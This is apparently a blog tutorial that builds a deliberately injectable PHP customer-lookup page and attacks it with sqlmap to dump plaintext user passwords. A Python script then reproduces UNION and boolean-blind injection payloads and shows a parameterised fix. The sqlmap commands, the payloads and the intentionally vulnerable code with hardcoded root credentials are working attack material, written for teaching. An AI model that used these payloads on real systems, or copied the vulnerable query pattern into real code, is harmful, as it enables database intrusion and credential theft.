Friday, 17 April 2015

SQL Injection Attack using sqlmap in Kali Linux


In this tutorial we build a small, deliberately vulnerable web application and run an SQL injection attack against it with sqlmap to pull the user names and passwords out of its database.

The web application and the database table it reads are given below:

1) The login page 'cust_login.html'

cust_login.html
<html>
<body>
 <!-- The form submits with GET, so the user name travels in the query string
      (cust_display.php?name=...), which is the parameter sqlmap targets below. -->
 <form method="get" action="cust_display.php">
   <label for="name">User Name:</label>
   <input type="text" id="name" name="name" /><br />

   <input type="submit" value="login" name="submit" />
 </form>
</body>
</html>


2) The page 'cust_display.php' looks up the submitted name and displays that customer's details


cust_display.php
<html>
<body>
<?php
// Untrusted input straight from the query string.
$name = $_GET["name"];

// Lab setup: root credentials for the 'hacking' database on the local MariaDB server.
$conn = new mysqli("localhost","root","root","hacking");
if ($conn->connect_error){
    die("Connection failed:  " . $conn->connect_error);
}

// Deliberately vulnerable: the GET parameter is concatenated into the SQL string,
// so a closing quote in the input turns the rest of it into SQL.
$sql = "select name,firstname,surname,address from customer where name = '" . $name . "'";
$result = $conn->query($sql);

// Only the first matching row is shown. A malformed query makes $result false and
// the next line raises a PHP error, which is the signal an error-based probe looks for.
$row = $result->fetch_assoc();
echo "firstname: " . $row["firstname"]. "<br>";
echo "surname: "   . $row["surname"].   "<br>";
echo "address: "   . $row["address"].     "<br>";

$conn->close();
?>
</body>
</html>


3) The MySQL (MariaDB) database table customer

 MariaDB [hacking]> desc customer;
+-----------+--------------+------+-----+---------+-------+
| Field     | Type         | Null | Key | Default | Extra |
+-----------+--------------+------+-----+---------+-------+
| name      | varchar(50)  | NO   | PRI | NULL    |       |
| passwd    | varchar(50)  | YES  |     | NULL    |       |
| firstname | varchar(50)  | YES  |     | NULL    |       |
| surname   | varchar(50)  | YES  |     | NULL    |       |
| address   | varchar(200) | YES  |     | NULL    |       |
+-----------+--------------+------+-----+---------+-------+


4) Launching the SQL injection attack against the web application with sqlmap

4.1) Enumerate the available databases (the URL is quoted because '?' is a shell glob character)
root@kali:~# sqlmap -u "http://www.mycompany.com/cust_display.php?name=shabbir" --dbs

available databases [6]:
[*] hacking
[*] information_schema
[*] mybank
[*] mysql
[*] performance_schema
[*] test

4.2) List the tables in database 'hacking'
root@kali:~# sqlmap -u "http://www.mycompany.com/cust_display.php?name=shabbir" -D hacking --tables

Database: hacking
[1 table]
+----------+
| customer |
+----------+


4.3) List the columns in table 'customer'
root@kali:~# sqlmap -u "http://www.mycompany.com/cust_display.php?name=shabbir" -D hacking -T customer --columns

Database: hacking
Table: customer
[5 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| address   | varchar(200) |
| firstname | varchar(50)  |
| name      | varchar(50)  |
| passwd    | varchar(50)  |
| surname   | varchar(50)  |
+-----------+--------------+

4.4) Dump the 'name' and 'passwd' columns from table 'customer'. The passwords come back in clear text because the application stores them unhashed.
root@kali:~# sqlmap -u "http://www.mycompany.com/cust_display.php?name=shabbir" -D hacking -T customer -C name,passwd --dump

Database: hacking
Table: customer
[4 entries]
+---------+--------+
| name    | passwd |
+---------+--------+
| pk      | aunty  |
| priya   | blue   |
| shabbir | admin  |
| taher   | hello  |
+---------+--------+
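As an added example that is not part of the original post, the following Python script reproduces by hand the mechanics that sqlmap automates in steps 4.1 to 4.4. It rebuilds the customer table from section 3 in an in-memory SQLite database (the name/passwd pairs are copied from the dump above; the firstname, surname and address values are constructed), reimplements the string-concatenated query from cust_display.php, pulls every name/passwd pair through it with a UNION payload, recovers one password character by character with boolean-blind payloads (the technique sqlmap falls back to when nothing from the injected query is echoed), and finally runs the same payloads against a parameterised version of the query. SQLite stands in for MariaDB, and the function names are assumptions.

```python
import sqlite3

# Constructed stand-in for the 'hacking' database from section 3.
# name/passwd come from the dump in step 4.4; the other columns are made up.
CUSTOMERS = [
    ("pk", "aunty", "P", "K", "1 First St"),
    ("priya", "blue", "Priya", "S", "2 Second St"),
    ("shabbir", "admin", "Shabbir", "T", "3 Third St"),
    ("taher", "hello", "Taher", "M", "4 Fourth St"),
]


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.row_factory = sqlite3.Row
    conn.execute("""CREATE TABLE customer (
        name varchar(50) PRIMARY KEY, passwd varchar(50),
        firstname varchar(50), surname varchar(50), address varchar(200))""")
    conn.executemany("INSERT INTO customer VALUES (?,?,?,?,?)", CUSTOMERS)
    return conn


def lookup_vulnerable(conn, name):
    """Mirror of cust_display.php: the GET parameter is concatenated into the SQL
    and only the first row comes back (None when nothing matches)."""
    sql = ("select name,firstname,surname,address from customer "
           "where name = '" + name + "'")
    row = conn.execute(sql).fetchone()
    return dict(row) if row else None


def lookup_safe(conn, name):
    """Hardened form: the value is bound as a parameter and can never become SQL."""
    sql = "select name,firstname,surname,address from customer where name = ?"
    row = conn.execute(sql, (name,)).fetchone()
    return dict(row) if row else None


def dump_union(lookup):
    """What 'sqlmap ... -C name,passwd --dump' does when a UNION works: the page
    shows one row, so walk the table one LIMIT offset at a time. The first
    SELECT matches nothing (name = ''), so only the UNION rows come back."""
    creds = {}
    offset = 0
    while True:
        payload = ("' UNION SELECT name, passwd, '', '' FROM customer "
                   "ORDER BY name LIMIT %d,1 -- " % offset)
        row = lookup(payload)
        if row is None:          # ran past the last row
            return creds
        creds[row["name"]] = row["firstname"]   # passwd lands in the firstname slot
        offset += 1


def blind_password(lookup, user, charset="abcdefghijklmnopqrstuvwxyz"):
    """Boolean-based blind extraction: the page shows the user's row only when the
    injected condition is true, so guess passwd one character at a time."""
    found = ""
    while len(found) < 50:       # passwd is varchar(50)
        for c in charset:
            payload = "%s' AND substr(passwd,%d,1)='%s' -- " % (user, len(found) + 1, c)
            if lookup(payload) is not None:
                found += c
                break
        else:
            break                # no character matched: end of the password
    return found


if __name__ == "__main__":
    conn = build_db()
    vuln = lambda n: lookup_vulnerable(conn, n)
    safe = lambda n: lookup_safe(conn, n)
    print("UNION dump:", dump_union(vuln))
    print("blind passwd for shabbir:", blind_password(vuln, "shabbir"))
    print("UNION dump against the parameterised query:", dump_union(safe))
```

In the run above sqlmap chose its own technique; `--technique=U` or `--technique=B` restricts it to the UNION or boolean-blind method shown here. The parameterised query returns nothing for either payload, which is the fix cust_display.php needs.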
